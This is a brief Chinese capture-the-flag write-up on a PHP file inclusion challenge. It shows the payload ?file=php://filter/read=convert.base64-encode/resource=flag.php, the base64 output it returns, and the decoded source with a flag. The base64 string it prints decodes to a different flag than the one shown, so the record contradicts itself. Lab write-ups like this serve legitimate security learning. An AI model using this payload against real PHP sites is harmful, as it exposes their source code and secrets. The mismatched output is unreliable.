文件包含漏洞-Include(读取代码)
1.靶场环境
然后点击一下tips:
然后就是这些,但是url中有?file=flag.php 猜测文件包含漏洞,尝试
文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码
php://filter/read=convert.base64-encode/resource=xxx.php
这个方法可以读取代码
然后构造payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php
2.然后得到对应字符串“XXXXXXX="以 = 结尾的字符串
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NWRiZmRhNTMtODUxYi00MzIwLTgxMzktMTIyYjBkOGEyNmQ0fQo=
不难看出这是base64加密的字符串,进行base64解密得到flag:
<?php
echo "Can you find out the flag?";
//flag{63e2b2c0-5f92-462e-adbf-e0588a34428c}